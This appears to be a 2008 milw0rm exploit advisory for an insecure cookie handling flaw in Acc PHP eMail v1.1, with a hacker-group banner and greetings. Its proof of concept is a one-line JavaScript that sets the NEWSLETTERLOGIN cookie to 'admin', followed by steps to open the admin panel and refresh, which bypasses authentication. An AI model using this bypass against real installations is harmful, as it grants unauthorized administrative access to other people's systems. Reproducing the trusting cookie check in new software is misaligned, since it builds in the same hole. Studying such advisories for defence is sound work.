28 lines
No EOL
1.1 KiB
Text
28 lines
No EOL
1.1 KiB
Text
###########################################################################
|
|
______ __ __ ______ __ ______
|
|
/ ____/___ \ \/ / / ____/___ ____/ /__ __________ /_ __/__ ____ _____ ___
|
|
/ __/ / __ `/\ / / / / __ \/ __ / _ \/ ___/ ___/ / / / _ \/ __ `/ __ `__ \
|
|
/ /___/ /_/ / / / / /___/ /_/ / /_/ / __/ / (__ ) / / / __/ /_/ / / / / / /
|
|
/_____/\__, / /_/ \____/\____/\__,_/\___/_/ /____/ /_/ \___/\__,_/_/ /_/ /_/
|
|
/____/
|
|
|
|
# [~] Discovered by : Hakxer
|
|
# [~] Type Gap :Acc PHP eMail v1.1 Insecure Cookie Handling
|
|
# [~] Script : http://www.accscripts.com/mailinglist/
|
|
# [~] Greetz : Allah .. " Allah AkBar .. " Big Hacking SoOoN
|
|
##########################################################################
|
|
|
|
|
|
PoC : javascript:document.cookie="NEWSLETTERLOGIN=admin";
|
|
javascript:document.cookie="NEWSLETTERLOGIN=Hakxer";
|
|
|
|
[~] Admin panel
|
|
http://www.accscripts.com/mailinglist/demo/index.php
|
|
[~] Execute JS Code javascript:document.cookie="NEWSLETTERLOGIN=admin";
|
|
[~] Refresh
|
|
|
|
|
|
# Proud To be a Muslim #
|
|
#_=END=_#
|
|
|
|
# milw0rm.com [2008-11-03] |